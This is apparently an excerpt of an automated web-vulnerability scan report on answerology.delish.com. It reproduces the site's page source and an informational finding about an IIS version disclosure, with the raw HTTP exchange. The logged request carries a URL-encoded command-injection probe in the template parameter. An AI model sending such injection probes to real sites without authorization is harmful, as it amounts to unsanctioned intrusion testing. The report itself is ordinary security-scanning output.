rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy 
family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=1384574749"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1384574749"></script> <script language="JavaScript" 
type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=1384574749"></script> <script type="text/javascript" src="/cssjs/headers.js?v=1384574749"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'page_not_found.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ 
segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=1384574749"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> 
layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id="msn_header_ad"> <div id="ad_container"> <span id="ams_delish_top"><div id="divID_DLSRD1" name="div_DLSRD1" align="..
IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- //index.aspx

//index.aspx

http://answerology.delish.com//index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetNam..

Extracted Version

Microsoft-IIS/6.0

Request

GET //index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Location: /index.aspx?template=page_not_found.ascx&error=
Content-Type: text/html; charset=utf-8
Content-Length: 174
Date: Sat, 17 Sep 2011 13:34:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.aspx%3ftemplate%3dpage_not_found.ascx%26error%3d">here</a>.</h2>
</body></html>